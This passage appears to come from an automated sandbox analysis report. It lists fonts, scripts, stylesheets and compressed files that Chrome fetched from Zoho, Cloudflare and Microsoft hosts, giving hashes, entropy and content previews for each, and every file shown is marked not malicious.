                                                    Preview:wOF2OTTO.........H(...^...........................(..h..D..*.`..X.6.$..8....h. [UG.@.2v_Y.&.A...T...n..j.6....M..tB.H.......&......2.1...K>y..Ul..v....k...}..q.1'rt...5..pF......9=.i.*Q.JL......I..}...,{+...e..#./...o.".31.UUY...HD..<w.6.*....4'n..2B..;}s.H@L.E.-..5.......L.|.W..p.._+..9L...D....}......?..W...4"L.xs..]7...6".$7.VVHw...'..tD.w.O?.H...%.;$...7V.t.I..-.q....Dg..=.q.j.........0.=........9..5....tt.....+{..@=..$G._..J.$.(.d..|z_ ....^....U.-X^Q.j..m...1.11r...c...._.........6j.....c.?.Iv..Q.U.............@.......2...m...5.Y.............$.[..0.p....9....D...R)]...}<.6..3aW..P9.....B.?.....z.K.........D......~.....+@Rb.f..#....6T....Ew!.,.m..........Q.6R.f.P...r......s...vL$3.p..`....9.Q&.. ...N.U....L{{..%Sv..Z..Hf."Ja`....k.44g..=6b..o9I.r)A./......T.D.m.....r..9g.u..9G..J.H....J.IH..$..$...*..UVR...:.b:.g.A...\....?....$g...]M.#C..p.......{Q.BM..*..D..f~ew..L%.z1..c........m.....b..."..$(P ..b4^}.2w...L..._~.].?...R@;.f..
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:Web Open Font Format (Version 2), TrueType, length 73012, version 2.8978
                                                    Category:downloaded
                                                    Size (bytes):73012
                                                    Entropy (8bit):7.997054746325916
                                                    Encrypted:true
                                                    SSDEEP:
                                                    MD5:B2524744CE8CB43A92C3F5B03DB64386
                                                    SHA1:F2634748D26EE3303C8264E3C0E19C8D12B02050
                                                    SHA-256:BFA283EC707F1C7ADC71C8572F018DD4D4DA0AB1310DEFB9ACC866F968A79020
                                                    SHA-512:29A4875DE78EE4F207F14A154515EE98D0404DF359A9F91E65F8D14CC1005C669C9052AB885C4B7BF3A158BDCCCBE1F2515EBB3F112DD1C8CDDEBF75D7E489C1
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://static.zohocdn.com/webfonts/robotoitalic/font.woff2
                                                    Preview:wOF2.......4.............#.....................?FFTM..~...L..L.`....R..<........Y.6.$..8..... .....f..D[....5....L.U...*......+.5|..\+[.W.U .. .td.?..HZ...L.......E.......@.O.~../..Y.[t.H.rx.n..'....;....X....q..n.D._..,..i^Q..C..X...H.e".b...fF.W....*.{B...1......>........'.\....\{o...7a.....G.H...}H..}....15..^]`R.......Z.w.V<..f......w.h...P.R.j..>.k....N...:....Xw..:P5.....*>..j.x...@.....5....A.V..........=.j.o#.]|..y..kZ..'n..E.k..pF...rB.u.].EV........,\..*.i...3..ey.8.&..R..!....x.~y>...~UM.t8+.H+#.1.!C.1u........s....._$5hII...%....].)i...."b.Y}..ywf.LU....1{..y....K6b..^.....T..F....0..0../0.H....5D.hJ........&.6..,...F.1gls.[.v...$......6..E.....Q....VY.m7..~9@s.n..16......H..G.D..rT..vC$....WT.|..t*.N^d( +......ki......6L...TH...T%<l.z.qo.O..I_..L...uk..:.....X...0.`9...:....h.y......=.fQB....X.....4g..B..........A..2...1W8.k...".. ......l!...I.~4d.'.l........v....g.,.V.nx...A,".jZ.X(@......m..$.]...).g>.u.7.h...n.2.>{t..).F.Q...
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with very long lines (616), with no line terminators
                                                    Category:downloaded
                                                    Size (bytes):616
                                                    Entropy (8bit):4.684293403307534
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:D0743609B19A796F851444E793A0C481
                                                    SHA1:DE201CECC1D2EAE092D4AD0E51A3F4AA975A1D38
                                                    SHA-256:00742B06EDD9C20BEAD247A03E67C309F5EA51424C75764DC59F9F28DCEEDDB5
                                                    SHA-512:AD05FD57908F4CBD876FCEA5396EA3F67479A63FB8EBA80320CD2B34EE1C044E0A33F3381F168F9A7FF038F98F39EFF113D81B7B6F9F9F51561C17BB800310AC
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzIS7gIJEkMKYfHx7dUSBQ0OSxGBEgUN6eNTdBIFDR3cwiISBQ2C9fguEgUNkWGVThIFDe301u4SBQ2RYZVOEgUN2KsWJRIFDZFhlU4SBQ1hzte8EgUNkWGVThIFDZFhlU4SBQ2RYZVOEgUNkWGVThIFDZFhlU4SBQ1ATKydEgUNkWGVThIFDZFhlU4SBQ2RYZVOEgUNrzE0ixIFDWKNrIASBQ2DZL2uEgUNkWGVThIFDRvocN0SBQ2RYZVOEgUNHXtDwhIFDZFhlU4SBQ21MyLnEgUNkWGVThIFDRVE7asSBQ3blMuDEgUNkWGVThIFDZFhlU4SBQ2vnEQIEgUNuqBweRIFDVSgS3oSBQ3eymHLEgUNkWGVThIFDTSnSUQSBQ3lf_iuEgUN0qMylBIFDRId30ESBQ0xrs1iEgUNkaeAuxIFDc3XTSoSBQ0LCXEREgUNjXJibhIFDZFhlU4SBQ2KLGCBEgUNkWGVThIFDQbtu_8=?alt=proto
                                                    Preview:CssDCgcNDksRgRoACgcN6eNTdBoACgcNHdzCIhoACgcNgvX4LhoACgcNkWGVThoACgcN7fTW7hoACgcNkWGVThoACgcN2KsWJRoACgcNkWGVThoACgcNYc7XvBoACgcNkWGVThoACgcNkWGVThoACgcNkWGVThoACgcNkWGVThoACgcNkWGVThoACgcNQEysnRoACgcNkWGVThoACgcNkWGVThoACgcNkWGVThoACgcNrzE0ixoACgcNYo2sgBoACgcNg2S9rhoACgcNkWGVThoACgcNG+hw3RoACgcNkWGVThoACgcNHXtDwhoACgcNkWGVThoACgcNtTMi5xoACgcNkWGVThoACgcNFUTtqxoACgcN25TLgxoACgcNkWGVThoACgcNkWGVThoACgcNr5xECBoACgcNuqBweRoACgcNVKBLehoACgcN3sphyxoACgcNkWGVThoACgcNNKdJRBoACgcN5X/4rhoACgcN0qMylBoACgcNEh3fQRoACgcNMa7NYhoACgcNkaeAuxoACgcNzddNKhoACgcNCwlxERoACgcNjXJibhoACgcNkWGVThoACgcNiixggRoACgcNkWGVThoACgcNBu27/xoA
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:HTML document, ASCII text, with very long lines (33380)
                                                    Category:downloaded
                                                    Size (bytes):33659
                                                    Entropy (8bit):5.536946013956216
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:6D05C02DA71D20B5AAD8F7E5D3B6C22A
                                                    SHA1:677B526B844A433AC19E0BF050AB91AD0718C9F9
                                                    SHA-256:9D2E8911D3B5385FEC103A68B577C7E3554EB32E814044DFC4B1A8939167DE9C
                                                    SHA-512:5AB652139A7816BD4D53AD78EA9005F794A295A0C8BCACF8429B4E389EED7ED50C5AE176A9A246638A962928C6F12FD51F23B4F8FA305D50446E8207FDB677E3
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://wms.zohopublic.com/v2/wmsconnector.html?tabid=-1_WR_1736357506852_8595&wmsid=-1&nocache=1736357510975&frameorigin=https%3A%2F%2Fworkdrive.zohopublic.com
                                                    Preview:.<!DOCTYPE HTML>.<html>. <head>. <title>Zoho WMS Server</title>. <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">. <meta http-equiv="X-UA-Compatible" content="IE=edge">. </head>. <body>. <script>.var WMS={};WMS.op=/opera 5|opera\/5/i.test(navigator.userAgent),WMS.ie=!WMS.op&&/msie/i.test(navigator.userAgent),WMS.pdomain="*",WMS.connected=!1,WMS.attached_sessions={},WMS.session_map={},WMS.disable=!1,WMS._PRD,WMS._UNAME,WMS._TICKET,WMS._ZUID,WMS._CONFIG,WMS._NNAME,WMS._SDOMAIN,WMS._RSID,WMS._SID=null;var WS={},LP={};WMS._MAXFAILURECOUNT=3,WMS.disablebind=!1,WMS.consecutivefailurecnt=0,WMS.lpt=new Date,WMS.pmoninterval=15e3,WMS.wmsresponse={missedseq:{},droppedseq:{},dropdispatch:{}},WMS.lastSeq=[],WMS.prevseq=0,WMS.infoarr=[],WMS.debuglimit=300,WMS.attmsg,WMS.url=null,WMS.initcountdown=!0,WMS.AUTHTYPE,WMS.ZAID,WMS.attemptwsconnection=!0,WMS.consecutivewsattempts=0,WMS.sessionidle=!1,WMS.lastupgradeattempt=null,WMS.upgradeattempts=0,
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:Web Open Font Format (Version 2), TrueType, length 216536, version 2.983
                                                    Category:downloaded
                                                    Size (bytes):216536
                                                    Entropy (8bit):7.997585594411744
                                                    Encrypted:true
                                                    SSDEEP:
                                                    MD5:E440B455263D1BA76054C4ECA0A130D4
                                                    SHA1:494B5AEBCC66420BCFC4DD76B4ECBFEBB8060581
                                                    SHA-256:CC8DE19B25B9DD924081325098380E3E6B27606548EC23002BB199B9206F31C1
                                                    SHA-512:EA3D8F62C6CFE5421236492B17EE7FDDE0363168461617935888FA7880CC593EEF83F3CE239834B70E197CD8E4E8B928BF8E5F2C7E0A5CCFDDE9407F794BC9A1
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://static.zohocdn.com/webfonts/lato2heavy/font.woff2
                                                    Preview:wOF2......M.......$...Mu...........................p..l.`..&..f...........N.6.$..<..@.. ..&. ..9[iT..8M.....nn..!{d......%i.u......P.c6...@.-.Q...!}..-.A&....\...`.1.}I.!.M4..................................L...d'...`}.........(!.$S..'I&.a.B.S...(#q.Y....yWH&C.EGq.H..\U].#..:G.$X....I.o....\.."$.$HH....*..l!.........).B*LT.S.^............(...rB.LAkg.UQOo....%)......H.,nA...k...PI#(.......L.i....2....Ab..J>_.(.c...o@n...GS...U...(7;.G..IF5...q..f...#..%l)X.|......i@d.*T.hA..E..RjFB...0.b......q..r.M.u. .N$..)..B..hf.Z.h......0D.....(R6.....6*...T...6.-.Q.L.[.$u....i.=..=9....=,.M`...m.......o`...../..:...5.....U.......Q..%.F..Z.....YA...L.B~.B..gx.F..a.9.C.0.Yu..~;.DMH.P..UEB...I...v.T&...T..6.."..H(..d%%.>../.k.u..l.Vl.....6[BE$$H...8..Zy...9.......N..b$.!1...4.f.<..3..B=.Kg.y.>@b.S.......<u.;.J1.H.4...*.f.....$.._.N9.Fb.4......Ty.k..Z5............RQ.*)..#G.7..C|....3.A.E.....8.s......#..^.^./.Z....j.v..G.LpGeW....A.......UT>~d..,.M........@Q.
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 450755
                                                    Category:dropped
                                                    Size (bytes):122515
                                                    Entropy (8bit):7.997419459076181
                                                    Encrypted:true
                                                    SSDEEP:
                                                    MD5:AC9A6ED508328361A4C9530325A94076
                                                    SHA1:ADC81FAE51EB66A220539EEEDECEB96CFF390BBB
                                                    SHA-256:BA93F4A83BB77D32AF9AFB9B014BFD13FD497E3D8F15AF016C782ABD1D34037B
                                                    SHA-512:066D92389A7EFB3A80FCFC86696EE6AE008259570F73814303A9ACC1690F881DF2034A16D5C7970BA703648CA79C2E7CBAA2CAD98C28879ADD44AB06620305B4
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview:...........}[.8......\&.L..{.x.t.nv.p......ql%xH...rB....J.-'..=...}...&.Jo.R..T*}.y..*.\....J....uipR..|zuT....(]..O..._.6.......?e%.;rb...F%?p.h.FN......|gZ.G.<..<..dn...~.@.....2T.y.K'J^K...*..6...P.....!).a.....6.. f.E......s..8.'......F.....KN.J1KJ.0J.x?..!B.Zcj....8t.....1......!vq..Ac.0..V.N..a..}(%a.5\..g..I..6...L...x.7.......8..B..J....^b/s.....I...r..L.3.... ..y...^K.l.....%.'.|.8.T.....$.R..8.j.?.R.f..}..o.....$....a.'..Q..g..p1.:1t.}..y..}8...3...8....b.=(..3..d[.*.Os......%....Z...G.......x...2.,..RP..+..O. _....n.;=.?.....w../au.I.p...U|;......WM.f?...9.>8..9.....S../;._..un...].:_..e..V*:.....@..[.*.Ue.'Pe..&wv..T..ow.........?..\)WVb..r.;.....A........mpW.X.........B.....I...}j.....(...1.e.D.~.....;F..:..P.=.....(r^........N1.F....@..W%y.....t...Q....Y.5.$.O..x@.l.4.a.b*.f..3.2.B...DL}4Y.:.u........`?....W`Z".S.S..}= .:......i.@E"1T.....`\.a....J:].....R....=R..y...*......s<;....~NXr<%...|.v&...5..*....D.(9...
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text
                                                    Category:dropped
                                                    Size (bytes):3601
                                                    Entropy (8bit):5.246965796714779
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:41D15D14CB7111EE5AEFDF751FB904EE
                                                    SHA1:C6E2EB18A8FF2DE6F27B55BA86CFBD983AED93E7
                                                    SHA-256:F4C5BC98EF0AAB63B935D37530CBFE3FC35E332450E994B4B81E6B793A2956D8
                                                    SHA-512:B86891C9635BEAD2DCF0428D3000F15834D14824F6FD8173261C849E86B4A7AA3437FEE36C120453D5D9BD815EAF6FED0513B4E24AFEE2959FCF34711190B5F6
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview:/*$Id$*/.Macros.getType = function() {. return "anyone"; //No I18N.};..Macros.getImageLibRemoteOptions = function(){..var options = {};..options.uploadURL = ZWNetworkUtils.getUrl('uploadImageFile'); //No i18n..options.enableGadgets = false;..var remoteCustomData = {};..ZWNetworkUtils.setCsrfParam(remoteCustomData);..options.customData = remoteCustomData;..return options;..};..Macros.review = {..addParticipant: function() {...var params = {};...params.time = new Date().getTime();....ZWNetworkUtils.sendAjax({....type: "POST", //No I18n....global: false,....url: ZWNetworkUtils.getNiceUrlPrefix(Macros.getRId() + "/util/addparticipant"), //No i18n....async: true, ....data: params,....dataType: 'json', //No i18N....setCsrfParam: true...});..},..getAccessType: function() {...return "anyone"; //no i18n..},..setTcView: function(tcMarkup, successCb, failureCb) {...successCb && successCb(tcMarkup);..}.};..Macros.isShareListAvailable = function() {..return false;.};..Macros.proofing = {..initU
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:Web Open Font Format (Version 2), TrueType, length 215804, version 2.983
                                                    Category:downloaded
                                                    Size (bytes):215804
                                                    Entropy (8bit):7.997736626509087
                                                    Encrypted:true
                                                    SSDEEP:
                                                    MD5:5DFA3BF44F169B7963ADC2149E69B635
                                                    SHA1:044E342691A5B3F966639DB7617FB8FB33BB3F54
                                                    SHA-256:ADAFE0F00F389E59EB85B9206C0D537161C13E4FFCB42DEAAAAF9632C5ECA763
                                                    SHA-512:665E1DB2955039DD6E182F32B8BF7D9C7CAED6D70051DE53C4DEEA4BB2FDA1C943E838B15BBBEBE50286FC01D10EE0E6C5A130EE44A5311AF690DEA37EB33464
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://static.zohocdn.com/webfonts/lato2regular/font.woff2
                                                    Preview:wOF2......J...........J............................r..l.`..&..f........0..).6.$..<..@.. .... ..9[84...N.s...X.....b......{......i.EU7 .j.....KK..kD......g2!...}&M....]...P..Y......................................$m......9......6.z~..X....Ba<.M..J..e.T.*(...cd.f.5..HHR(.X.36+^@U9.x.Y.76.q...j..&..Ft...F...I.....]SK^H...C...h..Ik2...ZD.E....Z....M..f.... H....;X..*.|..>...)....1!*.~..LS.dY.....P.JLS?7~..hp01..N.7..;....$.....Y....4....L.......$Z#.5...$e......,.T./PYh..^.....`D!..h.).D..........:o.!......P....a+*TV.U.AV5B.. .ki].L...z.%....%K.6n...!fm.r......_c-.%Z+.@.W..f.H..R.K.n\.-..E.[QJ5.{..P....+.Z.q.,... M.......lT...6..J..I`.Z..B....n.P.a.Z....V.F.=. !ABi......gY..U.L....I#!A......h.....&*a.B.j.[VI..!X.*...wNS#...Tl.. ..#.9B...E.$.<.0..I...\...U>.Z$$.b."G...;^EuyZ|BS.UH....,.EB'#...o!...S...8......bs......jR2.g..f?..~..M..wn.yZ5.,.\bV..X..Ml.]l...k;.......\..%.....uHH..vjD..W.t.....c...hG.].-.9sXc.&.."(.UHH.. M.,......%.\..)X.c..d
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with very long lines (65536), with no line terminators
                                                    Category:downloaded
                                                    Size (bytes):146295
                                                    Entropy (8bit):5.051141301586926
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:78DFA567633BA50E998FFEC957D68A09
                                                    SHA1:20C58C5547D13BF0811E1464580B850B5FB7F8B6
                                                    SHA-256:444C9E45A015313C11721B214C8A50669A6E08CEAE6BD0C81522037A0B485319
                                                    SHA-512:D4E5816D27963C73C42928820DB542D2D8D66F44DB44BBCCD5AA1B7ACC9E743038E7EFC667764A03DFB136E95191E09EB3486A9CEE30F3EE425F2D6426182340
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://static.zohocdn.com/writer3/styles/writer_lazy_min_all.78dfa567633ba50e998ffec957d68a09.css
                                                    Preview::root{--ff-light:"Lato-Light",open_sans_light,sans-serif;--ff-base:"Lato 2",open_sans_regular,sans-serif;--ff-medium:"Lato-Medium",open_sans_semi_bold,sans-serif;--ff-semibold:"Lato-Semibold",open_sans_semi_bold,sans-serif;--ff-bold:"Lato-Bold",open_sans_bold,sans-serif;--ff-heavy:"Lato-Heavy",open_sans_extra_bold,sans-serif;--ff-black:"Lato-Black",open_sans_extra_bold,sans-serif;--ff-italic:"Lato-Italic",open_sans_extra_regular,sans-serif;--ff-bolditalic:"Lato-BoldItalic",open_sans_extra_regular,sans-serif}.animatedf{-moz-animation-duration:.3s;-webkit-animation-duration:.3s;animation-duration:.3s;-moz-animation-fill-mode:both;-webkit-animation-fill-mode:both;animation-fill-mode:both}.ui-content-anim{opacity:1;text-rendering:optimizeLegibility;-moz-transition:all .2s;-webkit-transition:all .2s;transition:all .2s}.ui-content-anim h1,.ui-content-anim h2,.ui-content-anim h3,.ui-content-anim h4,.ui-content-anim h5,.ui-content-anim h6{text-align:initial;line-height:1.5}.ui-content-anim h1{
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:PNG image data, 71 x 22, 8-bit/color RGB, non-interlaced
                                                    Category:downloaded
                                                    Size (bytes):61
                                                    Entropy (8bit):3.8725127475032446
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:4B9D0B0DD2DE57F6DBFADD99B07997DB
                                                    SHA1:9FEA6EAA1A4EC891DBC5352D0EE4BA75943E71C3
                                                    SHA-256:DD3BDB2B9505283DC9E0CF7AC2F98DED4F8BFF66C7CEA4C8DCAEDAED938E0362
                                                    SHA-512:825EEA2199F518DE17306C9A7978D85CED8A27A8CE0D1E78F24D6E2E78551607A2F38199530C78212C27B1A66CB2FA64ED9204B1D60A2F1247BFDA908C919028
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/i/8fedec8f8d7f42ab/1736357518458/KnSDMMLJkTjGuA-
                                                    Preview:.PNG........IHDR...G.................IDAT.....$.....IEND.B`.
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:Web Open Font Format (Version 2), TrueType, length 211408, version 2.983
                                                    Category:downloaded
                                                    Size (bytes):211408
                                                    Entropy (8bit):7.996846007124003
                                                    Encrypted:true
                                                    SSDEEP:
                                                    MD5:892D83DB4F261BB2BC582FAB581CBE11
                                                    SHA1:6B59E60B3BFD3EC515FABFADABF4F7F7526CB33E
                                                    SHA-256:37E6F3A18F647597D16DF5B018F4DD2448947DEBB8A2BE59D6402D18159E9484
                                                    SHA-512:DAD5453334C538C3109ED77B9162189B0DDE42BE64B80EF8A979587F729356D97FB209C2EE9EF469EED0BA95440018413A18BEA91E73C79C71FE6A961D574E64
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://static.zohocdn.com/webfonts/lato2light/font.woff2
                                                    Preview:wOF2......9........t..9o...........................@..l.`..&..f........0..S.6.$..<..@.. ..&. ..9[>.........I.5....I..;.t.*....q....{..P"C=.........%.....T.ws.l..?..._.i...6.c[.<.Jhm.........................................\...A.>...s#A..+.."..D</.Ph.X<..}.Y..E.PZ2n....Y..R*CB..j...x.$D..UZk..b...2+..p=a.PU.a.5T#....j..g].B..E..H\)R..0C..0.`..qS)j6-!kmk..TGcgS.O...K.K.....~&.o.|...|.B.C8<b..<.2HT.\..!.=A..G..)%.[.Hh"...q.I.....SA....i....s...0...7|....bsP....L....(..u..ZG....Mf3...Id.*@.u-2.A....aqX9@."M.{-Xd}$]1d.".($H.B.....b<....N.^.f..Y..).....`..L.r..k..pe.ET.. Q...*.z.yk.DT.$.P......%...6.O.!.B...e..K..q.Y.$.NP..W............l=....4..P.!iI$P..P.6....+..*&...[.\?.6..JQD&lf.l.X ".DD.P.....!2.Y2s.F.h.`v.j.@fL.g.e.H.L.le[.6......K...U&.<.......J.a..iJ.1(:.%...T..p....d...0.x...l...Z....ee]~..z4.....-....,Z.z.'vH..r.)I...e.2;..^.o`.[&..{..4..22...Z..YJ.!qA.R..h.e.).f.=..0`c...!.`..x~f..`|S.%...S\...O.!. IK.l....V.*.d..B..:$j{........+=..z$.....
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:Web Open Font Format (Version 2), TrueType, length 67468, version 2.8978
                                                    Category:downloaded
                                                    Size (bytes):67468
                                                    Entropy (8bit):7.996395549140606
                                                    Encrypted:true
                                                    SSDEEP:
                                                    MD5:42619423F97DB1B7DF843127F0D12534
                                                    SHA1:8B3D8F01DA182B06F7B176848DC27059C442EB9F
                                                    SHA-256:2C7B8A31A614AA1D0BB6F64B784A14DE742F95BAB2D4805E87E3E64D0EE1778E
                                                    SHA-512:7362C6CD5FE7086C8E184E947BE7A783AA0CC377565DCA40A61FEC208B828B53EA8003F8139905A9DA6A810F139F1B732505E411B3713B5B40CE327DD77EFB45
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://static.zohocdn.com/webfonts/robotobold/font.woff2
                                                    Preview:wOF2...............\...$..#.....................?FFTM..~...$..L.`....H..<........E.6.$..8..... ..}..f..)[....5....&.\.M....3..c.`.....j...Nf.B.`..7.=....,.0......e....]....EE..."1.$Y.`";L...:Nb...*. %.b.yVl..on...2c. L...2.B..8BD...zRrN..`....<..\9..<...uv-...I...U.....3/...HyH..T3...b...0)\y.e/.......cw.O...F..t4. .jt;5.).....&...T..X.)g.....>..>v.v.j....T....-..`..... .o>!....P.n..#......$....6;.....a)...:U.N..'...4}...u).X<..8.b.7}Ti..R...2s..}.N}.aUW.Cu.k.P.B.....Q.gl.lx).&~..K."%.E|..C...f0%..]...3...[..M.g.Bw../....m...dM.4....Dz.......}..4..pY..V k....n.....0.T.I.Z...t{..W,...b../.....y*."..;....bG9...q...z..cx...v.....^\.?.....?DF....48..h..l.$.8..'R.T....Q...-.)J.......BT....~n..a$.RCR....`.,.U....m..T*f.}e.?E....?..?,...a...$..F.....T.{7.aUl...R^.A.h......`.@i.t.....d.......;'...._....).h.`.^S.b........nH.N....$......=.br:.I?..?.Hx".H...R......*#..: \......._{v.... v.P........=......]..@..1E=Gi..^..98....~.M.... XHWS..m.#...cL..
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:Web Open Font Format (Version 2), TrueType, length 53088, version 1.6554
                                                    Category:downloaded
                                                    Size (bytes):53088
                                                    Entropy (8bit):7.996429171604625
                                                    Encrypted:true
                                                    SSDEEP:
                                                    MD5:8DEBD3E60D621B511484D5AF13A44A41
                                                    SHA1:00E85B5C268C38BBFCFAC62535DF57C97AC5EC63
                                                    SHA-256:7AFC1C9C5482C8B2CFB49CDFC101A27F32DCE8018EE4DE3605A1E8928A88F50D
                                                    SHA-512:3BC56D83D25C52A8D4EFEEBBCFC606399C7D13341ED78185DA3764440581D3B4C72ECB53DF3CE5A2104F9C3F25A57AD2CE5176B326FE46C01EBD22EC63AFD9D7
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://static.zohocdn.com/webfonts/opensanssemibold/font.woff2
                                                    Preview:wOF2.......`....................................?FFTM.....\..D.`..n..&..4.....t....6.$..$..X.. ..O......[*.....6.0....m..YSP...(n.N..zn.D..B.x.t.v`nM_.e.....oI&1...o..#....VeU.4......m@A`<N%.E..j.|..<0T.. <5Fk.$Hy.].;.C.LvD.R..-...>..#.>}.....r...."K.)k..r7.b)...d......J..L...um.a...6..o...6.....S2./K....E}.....t.Q.'d.p..#....<.(W.v..\'Y.A.......h8".Y:..J..^.rZ....}.$.+.q....]...S.6a.(.....V..;.bv.(....R.t.....I.3.0.....O.2..*.A..0.~...N-.U....c.URn..wII.Z.z.....M..j|.z......xj.?................69d..........^.T#3.C..D........!..]u@...n.bL!."..#..!..V.....Bx....4=.'.H.G.9.[....S....F....).4~.....<.r4.d...7.......=....L-..r3......3......M..@..?...~...9....6.*T......f?O.|.M..h.8.".R.D...........^....vb$.Bb..*#.h.."-..f).......Z.....a.....$.6p......'.iI.x...'...NE)./.N..n]..T.....\..|...F.n..3.F.B.T..'.._......Y........$.=(.0eWa....*@...@..W..?.|.j....J.....^E.x..?...:...9*H.j..+...1.....{..l.?~......h.J.....:m..6..3g..Ov..pv....TE.. ..j......>.
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:Web Open Font Format (Version 2), TrueType, length 65812, version 2.8978
                                                    Category:downloaded
                                                    Size (bytes):65812
                                                    Entropy (8bit):7.996812090118691
                                                    Encrypted:true
                                                    SSDEEP:
                                                    MD5:BC9BD368DFB6DA1086AECED37312AAD5
                                                    SHA1:688147F7C55106A42E9C44A20DA9EE3811F9C996
                                                    SHA-256:9CE770FAADE65D27790CEF863C859148FEEC5AA5433210E952A1B4B384FBAF71
                                                    SHA-512:5E79A44A0F20A8F0FCAA1AECA0531B8C63EEAA84135739D6212E30D5F4F40E1FA369D94BBA53D4BB1503EE7ECEC4786128356FCF4F63399249F0B6CE740A9553
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://static.zohocdn.com/webfonts/robotothin/font.woff2
                                                    Preview:wOF2.....................#.....................?FFTM..~...R..L.`....H..<..........6.$..8..... ..Z..f..c[.....r.6..?..9..<.Y.q..c.Uv.fN..z^.N..Vx~t..,.T..........I..%.I>..@.....v.u.E..=..S>...V#.t.r.......]h.d2..@.D#:..p8".........lV,..&4...*Vx.XH...r.......5..}.DD.y..K:.......A=.B.C.;9..2.|c4.V.{!..A.p...C.y.|.'|.......[..w^.?...bz;..p'F......b.dAo.DvQ..2..|..'e.......}./}Y.Z.\.n...9.w.P..9".../5v~p..n.Z...mb].3$..dW...Uf*...).{..B.?.. 'b....*....;...:..[....H.n;}.h.+.]..:.......Vx)2.p.UJ..kl.....W)...16...H.,%.....:....?n..>K.`...N)S&.:.....7...w..............H..uR...T..R..y...A..}g....b.P..P%W....@_..hn....J+ ."........9.R...F.....A.x/..qQ...w.."..I7.>...m4....mq.._...6.n.Bu....... ?JH...D.c~...^.....h.P....m..._j.....T....-....+...v....s...."..9.6..5.H..#..?.t...._N....~...XB....`...X...e.Yy.....5...$.<.@H.XHR.....;..N!t....4.}P.j.{.c...6.G......m.65y.>..Q.6.._kc.n..5n.$.Q..X6.*(.x...M.Q.a?...s......@c@..{.{....vwf.#.}..J.+..,.o&.g.4k.x.?.._
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 142367
                                                    Category:downloaded
                                                    Size (bytes):49911
                                                    Entropy (8bit):7.994516776763163
                                                    Encrypted:true
                                                    SSDEEP:
                                                    MD5:9B96CC09F9E89D0334BA2FBC22B5197A
                                                    SHA1:B5FE69F39E9F61FEF88DF794F02DC4F4086E2592
                                                    SHA-256:E6331018533143C411BAE25326AB52FCED541C48674551AEA78E750855BDCD1D
                                                    SHA-512:2BDD71A34A7D6172AD4B7B6CF077A891D6266C148000EEF8345E2343E6C21ED8783B2EA328EF3BF7176462A3CA575D2D6D4B55A07138CFD1B02900C95F61077D
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://aadcdn.msauth.net/shared/1.0/content/js/BssoInterrupt_Core_zKox_QMcTIVut7mG_Z9Eew2.js
                                                    Preview:...........m[.8.0........OL....;w.....a.....\N.......h.r~........=........,..JU.......T~.l..?..y..2.X9.|xvP9...TN.......?.....qe.OE.~Gn,.J.T....0......r..#.V&Qx_I.De.._.8.+S?N..HL..J......%O..S........(=.gO.|.T.0......6.. ..y....x..*..8..p.T"1...|$.Cz..V.D%.Ie.F....^."..5....c...?..T8..._..b.gs.4....S]kDZ..7.J.V..l}..?.....c...g.A...8.......8.VB..*....^..f..O.*... ...`...H.{.$. OP..S..AC.gVE.I8..).-U.....R...A..%.T[...Fc{..49..If...y.'w.Q}..oz..v.....W...pp..%..G.+.r:.A.*.....[.:..s.?U......_............k.y0.U....+I5..0.>.Q%.".w.....O....5w..;.;.>..mr.k53r.......k.0.I.<.D......d&...c..jhE..zx.]....y|W....i...`.. .k.P...@.Uq.\;..1............z|.O..Y5..........XtR,....R...k3..<.*.\.2.>.;T..$...kj.5-.i?/..YH`!jb..Z..=.&.L..F...([..y....K5pzQ.>i.1.......0..P...@...L.".n.x..Cj?..w.:+...n..4..H.. .*....S.....h*....8....v.l.[M.0..q..c;.....0*..*.8.......l.TM..n "..km..S.<.T..].k.+1.....P.V...4-W.C....0-/.S;.w......K.z+...DZ....=q.E.@ .Dv.z...@.d.#tE...
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:Web Open Font Format (Version 2), CFF, length 67240, version 4.0
                                                    Category:downloaded
                                                    Size (bytes):67240
